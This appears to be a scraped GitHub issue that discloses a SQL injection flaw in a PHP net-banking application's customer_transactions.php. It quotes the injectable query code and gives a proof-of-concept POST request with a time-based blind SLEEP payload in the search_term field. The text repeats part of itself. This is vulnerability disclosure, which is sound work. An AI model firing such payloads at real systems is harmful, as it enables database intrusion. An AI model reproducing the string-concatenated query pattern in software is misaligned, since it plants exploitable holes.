You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
net-banking/customer_transactions.php from line 39,The $_POST['search_term'] parameter is controllable, the parameter search_term can be passed through post, and the $_POST['search_term'] is not protected from sql injection, line 166 $result = $conn->query($sql0); made a sql query,resulting in sql injection
......
......
......
if (!empty($_SESSION['search_term'])) {
$sql0 .= " WHERE remarks COLLATE latin1_GENERAL_CI LIKE '%".$_SESSION['search_term']."%'";
$filter_indicator = "Remarks";
if (!empty($_SESSION['date_from']) && empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date > '".$_SESSION['date_from']." 00:00:00'";
$filter_indicator = "Remarks & Date From";
}
if (empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date < '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Remarks & Date To";
}
if (!empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date BETWEEN '".$_SESSION['date_from']." 00:00:00' AND '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Remarks, Date From & Date To";
}
}
......
......
......
<?php$result = $conn->query($sql0);
......
......
......
POC
POST /net-banking/customer_transactions.php HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Content-Length: 13search_term=' AND (SELECT 2581 FROM (SELECT(SLEEP(5)))bIYx)-- Ldcj
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/customer_transactions.php
from line 39,The$_POST['search_term']
parameter is controllable, the parameter search_term can be passed through post, and the$_POST['search_term']
is not protected from sql injection, line 166$result = $conn->query($sql0);
made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: